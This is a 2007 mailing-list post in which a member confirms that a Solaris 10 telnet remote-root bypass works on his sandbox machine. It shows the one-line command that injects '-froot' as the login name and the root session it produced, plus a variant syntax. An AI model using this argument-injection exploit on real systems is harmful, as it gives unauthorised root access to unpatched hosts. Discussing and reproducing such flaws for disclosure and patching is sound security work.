[geeks] Solaris 10 Remote-Root Exploit

Doug McLaren dougmc at frenzied.us
Mon Feb 12 11:43:48 CST 2007

On Mon, Feb 12, 2007 at 11:21:13AM -0600, Lionel Peterson wrote:

| Just a few datapoints - anyone recreate this yet?


% telnet -l"-froot" sunspot
Connected to sunspot.
Escape character is '^]'.
Last login: Fri Feb  9 14:37:41 from lenny.vignette.
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005


It also worked on different accounts as well.

Now, this box does allow telnets in as root (intentionally, as it's a
sandbox type box) so maybe that's relevant.  It's probably not
anywhere near up to date on patches either.

(It also seems to work OK when done with a `telnet -l -froot sunspot',
for another data point.)

Doug McLaren, dougmc at frenzied.us
Kill -9 'em all, let root at localhost sort 'em out.

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